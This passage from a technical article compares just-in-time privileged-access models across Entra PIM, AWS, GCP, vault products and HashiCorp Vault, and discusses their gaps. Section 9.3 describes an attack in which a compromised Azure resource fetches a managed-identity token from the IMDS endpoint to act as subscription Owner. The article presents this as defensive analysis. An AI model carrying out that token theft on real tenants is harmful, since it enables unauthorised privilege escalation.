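  if (requested_seconds < MIN_SESSION_SECONDS || requested_seconds > MAX_SESSION_SECONDS) {
    throw new RangeError(
      `duration must be between ${MIN_SESSION_SECONDS} and ${MAX_SESSION_SECONDS} seconds`
    );
  }
  return requested_seconds;
}

// The bounded unit is the session: compute when its credentials stop working.
function sessionExpiry(issued_at, requested_seconds) {
  return new Date(issued_at.getTime() + resolveSessionDuration(requested_seconds) * 1000);
}

const expiry = sessionExpiry(new Date('2026-01-01T00:00:00Z'), 900);
console.log(expiry.toISOString()); // prints 2026-01-01T00:15:00.000Z
```

Note what the validator does not touch: the role-binding that allows the call in the first place. Only the session has an expiry.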

The AWS approach has clear strengths in multi-account AWS Organizations and in programmatic access. It is also the natural fit for any workload that needs short-lived credentials. The gaps relative to PIM: no built-in approval workflow, no equivalent of the PIM Alerts surface, and no eligible-versus-active distinction on the role-binding itself. A standing AssumeRole grant is, structurally, standing privilege; what is bounded is the session that consumes it.

Google Cloud: bound the binding

Google Cloud IAM took a different route. IAM Conditional Bindings let an allow policy include a Common Expression Language predicate that is evaluated at request time. The canonical temporal pattern is request.time < timestamp(...), which expires the binding at a wall-clock instant [@gcp-conditions]. There is a practical ceiling of one hundred conditional bindings per allow policy.

On top of conditional bindings, Google launched Privileged Access Manager (PAM) in public preview in May 2024 [@gcp-iam-release-notes], [@gcp-pam]. PAM adds the entitlement-and-grant workflow that PIM ships natively: eligible principals, eligible roles, max duration, justification, approvers, and notifications, with grant duration enforced by the underlying conditional binding revocation. Audit-event correlation is documented in a separate page [@gcp-pam-audit].

IAM Conditional Binding: a Google Cloud IAM role binding that includes a Common Expression Language predicate evaluated at request time. The most common temporal pattern, `request.time < timestamp(...)`, expires the binding at a wall-clock instant; Google Cloud Privileged Access Manager layers an entitlement-and-grant workflow on top [@gcp-conditions], [@gcp-pam].
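A time-bound binding of this kind can be sketched as a plain object. The `role`, `members`, and `condition` (`title`, `description`, `expression`) fields follow the allow-policy binding layout as I understand it; the `timeBoundBinding` and `bindingAllows` helpers, the role, and the member are hypothetical, and the local evaluator is only a stand-in for the server-side CEL evaluation.

```javascript
// Build an allow-policy binding that expires at a wall-clock instant.
function timeBoundBinding(role, member, expires_at) {
  // RFC 3339 UTC timestamp without fractional seconds, e.g. 2026-06-01T12:00:00Z
  const ts = expires_at.toISOString().replace(/\.\d{3}Z$/, 'Z');
  return {
    role,
    members: [member],
    condition: {
      title: 'temporary-access',
      description: `Expires at ${ts}`,
      expression: `request.time < timestamp("${ts}")`,
    },
  };
}

// Local stand-in for the predicate; the real evaluation happens in Google Cloud IAM.
function bindingAllows(expires_at, request_time) {
  return request_time.getTime() < expires_at.getTime();
}

const expires_at = new Date('2026-06-01T12:00:00Z');
const binding = timeBoundBinding('roles/storage.admin', 'user:alice@example.com', expires_at);
console.log(binding.condition.expression);
console.log(bindingAllows(expires_at, new Date('2026-06-01T11:59:59Z'))); // prints true
console.log(bindingAllows(expires_at, new Date('2026-06-01T12:00:00Z'))); // prints false
```

The binding object itself stays in the policy after the instant passes; it simply stops matching, which is the sense in which GCP bounds the binding rather than the session.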

The GCP approach is the closest hyperscaler analogue to PIM's eligible/active model in architecture, but the PAM productization shipped in preview in May 2024 [@gcp-iam-release-notes] -- roughly eight years after Azure AD PIM's 2016 GA -- and the alert and detection surfaces are correspondingly less mature.

The third-party vault: CyberArk, BeyondTrust, Delinea

The longest-standing answer is the one the third-party PAM market built. CyberArk, BeyondTrust, and Delinea -- all three 2024 Gartner Magic Quadrant Leaders for Privileged Access Management [@cyberark-press-2024], [@beyondtrust-press-2024], [@delinea-press-2024] -- bound the credential, not the assignment or the session. The credential exists permanently in the vault; access to the credential is bounded by session brokering, periodic password rotation, and full session recording.

The vault model has structural strengths PIM's role-assignment-state model cannot match. The vault covers heterogeneous estates that include Windows, Linux, network devices, databases, mainframes, and OT/SCADA appliances -- every system whose credentials cannot be re-architected to a cloud-IAM eligible-active object. Vault-and-broker products provide session recording for SOX and PCI-DSS evidence collection, and they integrate with credential-rotation workflows for legacy vendor appliances whose hard-coded credentials cannot be eliminated.

Most large enterprises run both Entra PIM (for Entra and Azure role assignments) and a third-party PAM product (for SSH, on-premises service accounts, database passwords, network devices). The two markets are complements more than substitutes.

HashiCorp Vault and OpenBao: bound the credential's lifetime

HashiCorp Vault took the credential-bounded idea and made it ephemeral through dynamic secrets: a credential materialized on demand by Vault for a configured backend (a database, a cloud IAM, a PKI), returned with a lease and TTL, and revoked at the backend when the lease expires [@vault-databases]. The OpenBao fork, governed under the Linux Foundation, preserves the same dynamic-credential semantics [@openbao].

OpenBao was created in late 2023 after HashiCorp moved Vault from the open-source MPL to the Business Source License. The Linux Foundation announced on April 30, 2024 that OpenBao would join LF Edge as one of four new projects (alongside EdgeLake, InfiniEdgeAI, and InstantX) at the Open Networking and Edge (ONE) Summit [@lfedge-openbao-2024]. The dynamic-secret primitive -- "create a credential, hand it out, revoke it at lease expiry" -- is preserved on both code lines.

Dynamic secret: a credential materialized by Vault on demand for a configured backend -- database, cloud IAM, or PKI -- returned with a lease ID and TTL; at lease expiry Vault revokes the credential at the backend. The canonical 2026 open-source primitive for replacing hard-coded application credentials [@vault-databases].
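The "create, hand out, revoke at lease expiry" cycle can be modelled in a few lines. This is a toy in-memory model, not Vault's or OpenBao's API: `LeaseManager`, `fake_db`, and the credential naming are all hypothetical, and time is passed in explicitly so the behaviour is deterministic.

```javascript
// Toy model of lease-based dynamic credentials; not the Vault or OpenBao API.
class LeaseManager {
  constructor(backend) {
    this.backend = backend;
    this.leases = new Map(); // lease_id -> { credential, expires_at }
    this.next_id = 1;
  }

  // Materialize a fresh credential at the backend and attach a lease to it.
  issue(role, ttl_seconds, now) {
    const credential = this.backend.create(role);
    const lease_id = `lease-${this.next_id++}`;
    this.leases.set(lease_id, { credential, expires_at: now + ttl_seconds * 1000 });
    return { lease_id, credential, ttl_seconds };
  }

  // Revoke every credential whose lease has expired, at the backend itself.
  sweep(now) {
    const revoked = [];
    for (const [lease_id, lease] of this.leases) {
      if (lease.expires_at <= now) {
        this.backend.revoke(lease.credential);
        this.leases.delete(lease_id);
        revoked.push(lease_id);
      }
    }
    return revoked;
  }
}

// Hypothetical backend: a set of currently valid database usernames.
const fake_db = {
  live: new Set(),
  counter: 0,
  create(role) {
    const user = `v-${role}-${++this.counter}`;
    this.live.add(user);
    return user;
  },
  revoke(user) {
    this.live.delete(user);
  },
};

const manager = new LeaseManager(fake_db);
const lease = manager.issue('readonly', 60, 0); // 60-second TTL issued at t=0 ms
const swept_early = manager.sweep(59000); // nothing has expired yet
const swept_late = manager.sweep(60000); // lease-1 is revoked at the backend
console.log(lease.credential, swept_early, swept_late, fake_db.live.size);
```

The design point is that revocation happens at the backend, so a leaked credential stops working even if the holder never returns it.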

The Vault story matters for our purposes because it is the strongest 2026 coverage of the application-identity surface -- dynamic database credentials, Kubernetes service-account tokens, cloud-IAM short-lived credentials. PIM does not cover that surface today; Vault does. This previews the open boundary in section 9.

What is bound, in one comparison table

| Method | What is bound | Mechanism | Default duration | Approval workflow | Detection layer | Partner tenant | Application identities | License |
|---|---|---|---|---|---|---|---|---|
| Entra PIM | Assignment state | eligible -> active transition with policy gates | 1h (Global Admin) | Built-in approver routing | Six behavioural PIM Alerts plus Sentinel UEBA | GDAP + Lighthouse | Not yet (open boundary) | Entra ID P2 or Entra ID Governance |
| AWS IAM Identity Center + STS | Session credential | AssumeRole returns access/secret/session token | 1h | Not built-in | Not equivalent to PIM Alerts | Not directly comparable | Strong (short-lived creds native) | Included in AWS |
| GCP IAM + PAM | Policy binding | CEL predicate plus entitlement-and-grant | Per entitlement | Built-in via PAM | Audit events plus Cloud Audit Logs | Cross-org via folders | Service-account impersonation | Included in GCP |
| CyberArk/BeyondTrust/Delinea | Credential knowledge | Vault stores, broker hands out, rotates | Per session policy | Built-in approver routing | Session recording, full SIEM integration | Per-tenant deployment | Coverage via shared accounts | Per-seat commercial |
| HashiCorp Vault / OpenBao | Credential lifetime | Lease-based revocation, dynamic secrets | Per backend, per lease | Optional plugins | Audit log; lease events | N/A | Strong (dynamic secrets) | Open source / commercial |

The five methods occupy four positions on the "what is bound" axis: assignment-state (PIM), session-credential (AWS), policy-binding (GCP), and knowledge-of-credential (CyberArk and Vault). The methods are architecturally distinct, and the right enterprise answer in heterogeneous estates is some composition of more than one.

PIM is the most mature JIT-admin product in the cloud, and it has the most complete coverage of the user-principal surface. The remaining gaps are not about catching up to the competitors; they are about a class of identity the eligible/active model was never designed to gate.

9. What the JIT-Admin Pattern Does NOT Close

For all the architectural elegance of the two-state assignment object, PIM does not close the JIT-admin problem. It closes a sub-problem, very well, and leaves five structural limits an honest treatment must name.

9.1 Standing eligibility is itself standing privilege

PIM bounds the active duration. It does not bound the eligibility duration. A user with a permanent-eligible Global Administrator assignment is one activate() call away from the role's permissions for the next hour. If that user has been phished -- credential plus MFA bypass via a session-cookie capture, say -- the attacker can satisfy the gates. The MFA challenge passes. The justification text is whatever the attacker types. The approval, if required, routes to the legitimate approver, who may approve a legitimate-looking request that actually came from the attacker.

PIM produces an audit-log record of every step. It does not produce a structural impossibility. Eligibility is itself a security-critical property of the identity, and standing eligibility is the modern analogue of standing membership: a long-lived relationship between principal and role that a successful credential compromise can exercise.

9.2 Approver collusion

The approval gate is two-phishee resistant, meaning an attacker must phish two people, only when the requester and the approver have to be compromised independently. Two-phishee collusion -- the requester and the approver are the same adversary, or two adversaries cooperating -- defeats the workflow at the mechanism layer. The usual mitigations raise the bar: named approvers rather than approver groups (which can be compromised at the group level), CA-gated approval actions, and four-eyes alternatives. None closes the class.

9.3 The application-identity gap

This is the article's heaviest limit, and it deserves the most space.

PIM's eligible-active state machine is currently defined over principal in (user | group). Service principals, managed identities, and OAuth consent grants do not flow through PIM activation. Their role assignments are permanent and active by default, and there is no eligible category that applies to them. Microsoft Learn's documentation for Workload ID Premium and Conditional Access for workload identities makes this explicit: ID Protection workload-identity risk detections cover service principals in single-tenant, non-Microsoft SaaS, and multitenant apps, but "Managed Identities aren't currently in scope" [@ms-learn-workload-identity-risk]. Conditional Access for workload identities applies similarly only to service principals owned by the organization, and CA policies "assigned to a group that contains a service principal are not enforced for that service principal" [@ms-learn-ca-workload-identity].

Andy Robbins's three-part Managed Identity Attack Paths series, published June 6-8, 2022 on the SpecterOps blog, is the canonical demonstration of how this gap is exploited [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3]. The mechanism is direct. An Azure compute resource -- an Automation Account [@robbins-mip-part1], a Logic App [@robbins-mip-part2], or a Function App [@robbins-mip-part3] -- carries an attached managed identity. The managed identity holds standing role assignments at whatever scope the operator granted, often Owner or Contributor on a subscription.

From inside the resource, any code can fetch an OAuth access token for the managed identity by calling the Azure Instance Metadata Service endpoint at http://169.254.169.254/metadata/identity/oauth2/token. No human in the loop. No MFA challenge. No PIM activation. The audit log records a service-principal token issuance, not an alice-clicked-Activate event.

"Managed Identity assignments are an extremely effective security control... But Managed Identities introduce a new problem: they can quickly create identity-based attack paths in Azure that may lead to escalation of privilege opportunities." -- Andy Robbins, *Managed Identity Attack Paths, Part 1: Automation Accounts*, June 6, 2022 [@robbins-mip-part1]

Managed identity: an Azure-managed service principal whose credentials are issued and rotated by Azure itself. The underlying Azure resource (a VM, App Service, Function App, Logic App, AKS cluster) retrieves the OAuth access token via the Instance Metadata Service endpoint. Managed identities are not currently in scope for PIM activation; their role assignments are permanent and active [@ms-learn-managed-identities-overview].

IMDS endpoint: the Azure Instance Metadata Service endpoint at `http://169.254.169.254/metadata/identity/oauth2/token`, a link-local non-routable address reachable only from inside the Azure resource itself, that returns an OAuth 2.0 access token for the attached managed identity. The address is the credential: any process running on the resource can fetch the token without storing or presenting any secret.

sequenceDiagram
    autonumber
    participant Attacker
    participant FunctionApp as Compromised Function App
    participant IMDS as IMDS endpoint 169.254.169.254
    participant ARM as Azure Resource Manager
    participant PIMUnused as PIM activation (unused)
    Attacker->>FunctionApp: Code execution via supply-chain or vuln
    FunctionApp->>IMDS: GET /metadata/identity/oauth2/token
    IMDS-->>FunctionApp: OAuth access token for managed identity
    FunctionApp->>ARM: Action as Owner on subscription
    ARM-->>FunctionApp: Action succeeds
    Note over PIMUnused,Attacker: No human, no MFA, no activation, no PIM audit
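To make "the address is the credential" concrete, the sketch below only constructs the token request and does not send it. The endpoint path comes from the text above; the `Metadata: true` header, the `api-version` value, and the `resource` parameter reflect my understanding of the Azure managed-identity documentation and should be treated as assumptions to verify. The `buildImdsTokenRequest` helper is hypothetical.

```javascript
const IMDS_TOKEN_URL = 'http://169.254.169.254/metadata/identity/oauth2/token';

// Build (but do not send) the request any process on the resource could make.
// Nothing here is a secret: no password, no key, no certificate.
function buildImdsTokenRequest(resource, api_version = '2018-02-01') {
  const url = new URL(IMDS_TOKEN_URL);
  url.searchParams.set('api-version', api_version); // assumed version string
  url.searchParams.set('resource', resource); // audience the token is requested for
  return {
    method: 'GET',
    url: url.toString(),
    headers: { Metadata: 'true' }, // assumed required header
  };
}

const token_request = buildImdsTokenRequest('https://management.azure.com/');
console.log(token_request);
```

Everything in the request is public knowledge, so the only control that matters is what the managed identity is allowed to do once the token comes back.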

MITRE ATT&CK maps the class explicitly. T1078.004 -- Valid Accounts: Cloud Accounts cites Robbins's Part 1 as primary reference for the managed-identity case [@mitre-t1078-004]. The page reads: "In Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to Steal Application Access Tokens to move laterally across the cloud environment" [@mitre-t1078-004].

T1548.005 -- Temporary Elevated Cloud Access explicitly names PIM as an instance of the JIT-access pattern adversaries abuse: "Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles... Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner" [@mitre-t1548-005].

T1548.005 (Temporary Elevated Cloud Access) lists Microsoft's *Approve just-in-time access requests* documentation as citation [1] of the technique, recognizing PIM as a canonical implementation of the JIT-access pattern adversaries abuse [@mitre-t1548-005]. Being named in the ATT&CK framework is, in the security domain, the most explicit acknowledgement an adversary model can give a defensive product.

Note: Three anchors to walk away with: Andy Robbins's June 2022 Managed Identity Attack Paths series [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3]; MITRE ATT&CK T1078.004 citing Robbins as primary [@mitre-t1078-004]; the IMDS endpoint at 169.254.169.254 as the technical mechanism [@ms-learn-managed-identities-overview]. If your tenant has any managed identity with Owner or User Access Administrator at a subscription scope, you have an unmediated bypass path around PIM until that role assignment is tightened.
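The check in the note above can be sketched as a filter over role assignments. The record shape, the `principal_type` values, and `findStandingWorkloadPrivilege` are hypothetical, not an Azure API, and the scope test only recognizes subscription-level scope strings of the form `/subscriptions/<id>`.

```javascript
// Hypothetical role-assignment records for illustration; not an Azure API shape.
const role_assignments = [
  { principal: 'func-billing-mi', principal_type: 'managed-identity', role: 'Owner', scope: '/subscriptions/sub-prod' },
  { principal: 'alice@contoso.com', principal_type: 'user', role: 'Owner', scope: '/subscriptions/sub-prod' },
  { principal: 'logicapp-sync-mi', principal_type: 'managed-identity', role: 'Reader', scope: '/subscriptions/sub-prod' },
  { principal: 'ci-deployer', principal_type: 'service-principal', role: 'User Access Administrator', scope: '/subscriptions/sub-dev' },
  { principal: 'runbook-mi', principal_type: 'managed-identity', role: 'Owner', scope: '/subscriptions/sub-prod/resourceGroups/rg-ops' },
];

const HIGH_RISK_ROLES = new Set(['Owner', 'User Access Administrator']);
const WORKLOAD_TYPES = new Set(['managed-identity', 'service-principal']);

// True only for scopes that name a subscription and nothing beneath it.
function isSubscriptionScope(scope) {
  return /^\/subscriptions\/[^/]+\/?$/.test(scope);
}

// Application identities holding standing high-risk roles at subscription
// scope: the paths that never pass through a PIM activation.
function findStandingWorkloadPrivilege(assignments) {
  return assignments.filter(
    (a) =>
      WORKLOAD_TYPES.has(a.principal_type) &&
      HIGH_RISK_ROLES.has(a.role) &&
      isSubscriptionScope(a.scope)
  );
}

const findings = findStandingWorkloadPrivilege(role_assignments);
console.log(findings.map((a) => `${a.principal}: ${a.role} on ${a.scope}`));
```

Two assignments are flagged here, `func-billing-mi` and `ci-deployer`. The resource-group-scoped Owner is excluded only because this sketch is limited to subscription scope; a real review would likely widen the net.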

9.4 The assignment-bypass alert is detective, not preventive

The High-severity assignment-bypass alert documented in §7 is detective by design (see Aha #2). The structural limit it leaves open is that preventive blocking is not the PIM product's default: customers who want it layer a Conditional Access policy on the Microsoft Graph endpoint or an Azure Policy at the management-group scope [@ms-learn-azure-policy], accepting that some legitimate Graph integration may need an exception.

9.5 Customer-owned PIM policy in CSP and Lighthouse scenarios

In the partner-managed case, the customer (not the partner) controls the PIM policy on a delegated authorization [@ms-learn-lighthouse-eligible]. This is the right place to put control, but it is also the place misconfiguration is most common. A customer whose Lighthouse eligible authorization is set with permissive activation policies (no MFA, no approval, large maximum duration) has an unmediated partner activation surface, and the partner cannot tighten the customer-side policy. The MSP-managed case is the operational gotcha most frequently raised at PIM-deployment review boards.

Aha #3: The gap is a data-model problem, not a patchable defect

This is the third aha moment, and it lands differently from the first two.

Key idea: The application-identity gap is not a backlog item. Extending the eligible-active state machine from principal in (user | group) to principal in (user | group | service principal | managed identity | OAuth consent grant) is a data-model extension that would require changes to the role-assignment object schema, the Microsoft Graph role-management endpoints, the PIM evaluation pipeline, the audit-log schema, the Sentinel detection schema, and every downstream IGA tool. The 2024+ Microsoft responses extend some controls to application identities. They do not yet introduce an eligible/active assignment-category type for application principals.

Microsoft has shipped partial responses. Entra Workload ID Premium is a separate three-dollar-per-workload-identity-per-month SKU [@ms-entra-workload-id-product] that unlocks Conditional Access for workload identities [@ms-learn-ca-workload-identity] (with the explicit managed-identity exclusion clause) and ID Protection workload-identity risk detections [@ms-learn-workload-identity-risk]. The PIM page on access reviews documents that "Using Access Reviews for Service Principals requires a Microsoft Entra Workload ID Premium plan in addition to a Microsoft Entra ID P2 or Microsoft Entra ID Governance license" [@ms-learn-pim-access-reviews]. Microsoft's flagship Ignite 2025 announcement was Microsoft Entra Agent ID for AI agents [@ms-entra-ignite-2025]; that announcement provides identity for AI workloads, not an eligible-active type extension for service-principal role assignments.

Robbins's class is closed-form within the 2026 PIM architecture. Closing it requires a new architecture, not a patch.

None of these limits is a defect. Each is a deliberate design boundary, and naming them is the academic honesty the topic deserves. The interesting question: where is active research happening, and what would closing the gap actually look like?

10. Open Problems: Where Active Research Is Happening

The five limits in section 9 are settled architectural boundaries. The open problems are different. Each is something nobody has shipped a complete solution to as of 2026, but each has named partial results and named anchors.

10.1 JIT-gating application identities

The data-model extension previewed in section 9's Aha #3 is the largest open problem in this space, and the one Microsoft is responding to most publicly.

What has been tried. Entra Workload ID Premium at three dollars per workload identity per month [@ms-entra-workload-id-product]. Conditional Access for workload identities, which lets the tenant block service-principal sign-ins based on IP range, ID-Protection risk score, or authentication context [@ms-learn-ca-workload-identity]. ID Protection workload-identity risk detections that flag suspicious sign-ins, leaked credentials, and admin-confirmed compromise for service principals [@ms-learn-workload-identity-risk]. Service-principal access reviews, gated behind Workload ID Premium plus Entra ID P2 or Governance [@ms-learn-pim-access-reviews]. Microsoft Entra Agent ID, the flagship Ignite 2025 announcement, brings first-class identity to AI agents [@ms-entra-ignite-2025] -- parallel to, but not the same as, an eligible-active type extension on application role assignments.

Workload identity: An identity used by a software workload to authenticate to other services. In Microsoft Entra ID the term encompasses application objects, service principals, and managed identities [@ms-learn-workload-identities-overview]. As of 2026, workload identities are not in scope of the eligible/active assignment-category model. The 2024+ Workload ID Premium SKU extends sign-in-time controls and risk detection to service principals, but does not yet introduce an eligible category for service-principal role assignments.

The conjecture. Closing this gap requires extending the role-assignment object's principal axis to include service principals, managed identities, and OAuth consent grants as first-class subjects of the eligible-active state machine. That extension would require well-defined activate() semantics for non-human principals, which is itself the hard problem, because the canonical user activation flow assumes an interactive MFA challenge.

Microsoft Learn states the difficulty bluntly: workload identities "can't perform multifactor authentication. Often have no formal lifecycle process. Need to store their credentials or secrets somewhere" [@ms-learn-workload-identities-overview]. The non-interactive case requires either programmatic policy gates (request from this caller, from this IP range, against this entitlement) or a delegation model where a human approver supplies the gate-passing event on the workload's behalf.
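A minimal sketch of what a programmatic gate for a non-interactive activation could look like, covering both options named above: caller, IP range, and entitlement checks, plus an optional human approver. Every name here (`ActivationRequest`, `GatePolicy`, `evaluate_gate`, the `role@scope` entitlement label) is hypothetical; no such PIM API ships today.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class ActivationRequest:
    caller_id: str                        # hypothetical: object ID of the requesting workload
    source_ip: str
    entitlement: str                      # hypothetical "role@scope" label
    human_approver: Optional[str] = None  # set when a human supplies the gate-passing event


@dataclass(frozen=True)
class GatePolicy:
    allowed_callers: frozenset
    allowed_networks: tuple               # CIDR strings, e.g. ("10.0.0.0/8",)
    allowed_entitlements: frozenset
    require_human_approver: bool = False


def evaluate_gate(request, policy):
    """Return (allowed, reason). Checks run in order and stop at the first failure."""
    if request.caller_id not in policy.allowed_callers:
        return False, "caller not allowed"
    address = ip_address(request.source_ip)
    if not any(address in ip_network(cidr) for cidr in policy.allowed_networks):
        return False, "source IP outside allowed ranges"
    if request.entitlement not in policy.allowed_entitlements:
        return False, "entitlement not allowed"
    if policy.require_human_approver and not request.human_approver:
        return False, "human approval missing"
    return True, "ok"
```

The delegation model is the `require_human_approver` flag: the workload still makes the request, but a person provides the event that an interactive MFA challenge would otherwise supply.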

10.2 Real-time activation-anomaly blocking

The PIM Alert "Roles are being activated too frequently" is post-hoc. It fires after the activation has already occurred and after the count crosses a threshold. The phished-but-still-authentic activation -- the attacker who supplies a valid MFA, a plausible justification, and a real ticket number -- is observationally indistinguishable from a legitimate emergency activation at the mechanism layer. The only signal that distinguishes them must come from behavioural telemetry.

What has been tried. Microsoft Defender for Cloud Apps ships an out-of-the-box user-and-entity behavioural analytics (UEBA) and machine-learning anomaly-detection layer; the documented policy weighs more than thirty risk indicators across eight risk-factor groups (risky IP, login failures, admin activity, inactive accounts, location, impossible travel, device and user agent, activity rate), with a seven-day initial learning period and a June 2025 transition to a dynamic threat-detection model [@ms-learn-dfca-anomaly]. Microsoft Sentinel UEBA scores anomalies post-event against AuditLogs operations including role-eligibility additions and activations [@ms-learn-sentinel-ueba]. Microsoft Defender for Identity correlates on-premises and cloud sign-in patterns for behavioural-anomaly detection. Neither Sentinel UEBA nor Defender for Cloud Apps is a synchronous gate. Both are detective layers that fire after the activation event has already created consequences.

The academic upper bound for what character-level and LSTM detectors achieve on adjacent tasks comes from Hendler, Kels, and Rubin's 2019 work on AMSI-based detection of malicious PowerShell code, which reports a true-positive rate of nearly 90% at a false-positive rate of less than 0.1% on the PowerShell-misuse classification problem [@arxiv-hendler-1905]. That is the ceiling a probabilistic activation-anomaly classifier could approach. It is not enough to gate synchronously without false-positive operational pain, which is why the deployed surface is post-hoc UEBA scoring rather than pre-commit blocking.

The conjecture. Synchronous gating on behavioural signal at activation time would require Conditional Access (or its successor) to subscribe to an activation-event hook and consume a risk score from ID Protection, Defender for Cloud Apps, or Sentinel UEBA in the few hundred milliseconds before PIM materializes the active assignment. The architectural primitives exist; the synchronous risk-evaluation hook does not yet ship.
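The shape of such a hook can be sketched in a few lines. This is an illustration only: `get_risk_score` stands in for whichever provider would supply the score, and the 0.5 threshold and 300 ms budget are assumed values, not documented ones.

```python
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import TimeoutError as FutureTimeout


def gate_activation(get_risk_score, principal_id, max_risk=0.5, budget_seconds=0.3):
    """Return "allow" or "deny" before the active assignment would materialize.

    Fails closed: a late or failing risk provider results in "deny".
    """
    pool = ThreadPoolExecutor(max_workers=1)
    future = pool.submit(get_risk_score, principal_id)
    try:
        score = future.result(timeout=budget_seconds)
    except FutureTimeout:
        return "deny"   # score did not arrive inside the latency budget
    except Exception:
        return "deny"   # provider error
    finally:
        # Do not block the caller waiting for a slow provider to finish.
        pool.shutdown(wait=False)
    return "allow" if score <= max_risk else "deny"
```

Failing closed is the design choice that makes the false-positive cost visible: every provider timeout becomes a blocked administrator, which is the operational pain the deployed post-hoc layers avoid.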

10.3 Hybrid-bridge JIT

A single approval workflow spanning the on-premises (MIM PAM / shadow principals) and cloud (Entra PIM) boundaries is not a shipping product. Microsoft has Entra Cloud Sync and Entra Connect for directory synchronization; neither bridges the activation workflow. MIM 2016 is on extended support through January 9, 2029 [@ms-learn-mim-2016]; Microsoft Learn states the path forward is cloud-first PIM with on-prem AD progressively scoped down to the few resources that cannot move [@ms-learn-mim-pam-overview].

MIM 2016 PAM is in extended support, not active development, and Microsoft Learn explicitly states it is "not recommended for new deployments in Internet-connected environments" [@ms-learn-mim-pam-overview]. SP3 ships compatibility updates for SharePoint SE, Exchange SE, and SQL Server 2022 [@ms-learn-mim-2016], but the product line is in maintenance posture. The on-premises half of a hybrid-bridge JIT story requires a different architectural choice than re-investing in MIM.

10.4 Coverage-as-code

How do you evaluate PIM policy coverage in CI/CD for a tenant with two hundred custom Azure roles and fifty directory roles, and gate every PR that touches the role-management policies?

Best partial results. Microsoft Cloud Security Benchmark v3 Privileged Access controls (PA-1, PA-2, ...) give Boolean per-recommendation pass/fail evaluation [@ms-learn-mcsb-v3-pa] -- close, but per-recommendation Boolean rather than composable policy. The PowerShell cmdlets Get-MgPolicyRoleManagementPolicy and Get-MgPolicyRoleManagementPolicyAssignment read role-management policies via Microsoft Graph; the cmdlets ship in the Microsoft.Graph.Identity.SignIns module, despite the Identity Governance branding [@ms-learn-graph-pim-policy-cmdlet]. The EntraOps Privileged EAM community project on GitHub, maintained by Thomas Naunheim, demonstrates the "track changes and history of privileged principals and their assignments as code" idiom against the Enterprise Access Model classification [@entraops-github]. Azure Policy itself operates on Azure resource configurations and does not directly evaluate PIM role-management policy state [@ms-learn-azure-policy], which is the data-model gap that drives the GitOps-flavoured drift-detection community pattern.

Note: The PIM role-management-policy cmdlets are commonly mis-attributed to the Microsoft.Graph.Identity.Governance PowerShell module because of the Identity Governance branding. They are actually in Microsoft.Graph.Identity.SignIns. The line that brings the cmdlets into scope is `Import-Module Microsoft.Graph.Identity.SignIns` [@ms-learn-graph-pim-policy-cmdlet].

// Take an array of role-management policy assignments
// (the kind Get-MgPolicyRoleManagementPolicyAssignment returns)
// and assert tenant-wide PIM coverage invariants.

The conjecture. A full coverage-as-code primitive needs Azure Policy (or its successor) to evaluate PIM role-management policy state with the same first-class semantics it applies to Azure resource configuration. That extension would let a tenant declare an invariant -- "every role in the control plane has requires_mfa=true and max_duration_hours <= 1" -- and have the platform enforce it continuously across drift, the way Azure Policy already enforces resource invariants.
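Until the platform evaluates that invariant natively, a CI job can approximate it over exported policy data. The sketch below assumes each policy has already been flattened into a dictionary with `role`, `plane`, `requires_mfa`, and `max_duration_hours` keys; that record shape is hypothetical and is not what the Graph cmdlets return directly.

```python
# Declared invariants per Enterprise Access Model plane (values taken from the text above).
INVARIANTS = {
    "control": {"requires_mfa": True, "max_duration_hours": 1},
}


def coverage_violations(policies, invariants=INVARIANTS):
    """Return one human-readable message per violated invariant, in input order."""
    violations = []
    for policy in policies:
        rule = invariants.get(policy["plane"])
        if rule is None:
            continue  # no invariant declared for this plane
        if rule["requires_mfa"] and not policy["requires_mfa"]:
            violations.append(f"{policy['role']}: requires_mfa must be true")
        if policy["max_duration_hours"] > rule["max_duration_hours"]:
            violations.append(
                f"{policy['role']}: max_duration_hours "
                f"{policy['max_duration_hours']} exceeds {rule['max_duration_hours']}"
            )
    return violations
```

A pipeline step would fail the pull request whenever the returned list is non-empty. That is drift detection, not enforcement: the check reports a violation after the policy changed, where a native primitive would stop the change.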

10.5 Adaptive-cadence eligibility reviews

Should eligible membership be access-reviewed at higher cadence than active assignments? Eligible membership is standing privilege; active membership is bounded. The argument for adaptive cadence -- reviewing eligibility more frequently when behavioural signals or organizational events suggest the principal may no longer need the role -- is intuitive but mechanically unshipped.

Best partial result. The 2024+ ML-based access-review recommendations [@ms-learn-review-recommendations] -- inactive-user 30-day Deny, user-to-group-affiliation Deny -- are within-cycle reviewer-assist features. They help reviewers decide during a configured access review. They are not cross-cycle adaptive-cadence triggers that fire a new review off-schedule when conditions warrant.

These are research problems. The practitioner does not have the luxury of waiting for them to be solved. What does Monday morning look like for the architect who has read this far and now has to deploy?

11. Practical Guide: Monday Morning for the 2026 Tenant Architect

You have read ten thousand words. You are responsible for a Microsoft 365 tenant that audits against SOX, SOC 2, and ISO 27001. You have a budget for Entra ID P2 (or Entra ID Governance) per privileged user. What do you do on Monday?

Work in this order. The list is ordered by cost-to-impact, with the cheapest, highest-impact items first.

Step 1: Baseline the Tier-0 surface

Every directory role at "Privileged" classification or above should be PIM-eligible-only. The exceptions are the two emergency-access permanent-active Global Administrator accounts (break-glass), which we return to in Step 4.

Activation requires MFA, approval, justification, and ticket number for control-plane and management-plane roles. Maximum activation duration is one hour for Global Administrator and Privileged Role Administrator, and four hours for less-privileged roles. Configure per role per scope; remember that PIM-for-Azure-Resources policies do not inherit.

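# The directory role-management cmdlets used here ship in Microsoft.Graph.Identity.Governance.
Import-Module Microsoft.Graph.Identity.Governance
Connect-MgGraph -Scopes 'RoleManagement.Read.Directory','User.Read.All'
# Resolve the Global Administrator role definition ID by display name.
$gaRoleId = (Get-MgRoleManagementDirectoryRoleDefinition `
    -Filter "displayName eq 'Global Administrator'").Id
# List every active assignment of that role, expanding the principal to show its UPN.
Get-MgRoleManagementDirectoryRoleAssignment `
    -Filter "roleDefinitionId eq '$gaRoleId'" `
    -ExpandProperty Principal |
    Select-Object @{n='User';e={$_.Principal.AdditionalProperties.userPrincipalName}}, RoleDefinitionId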

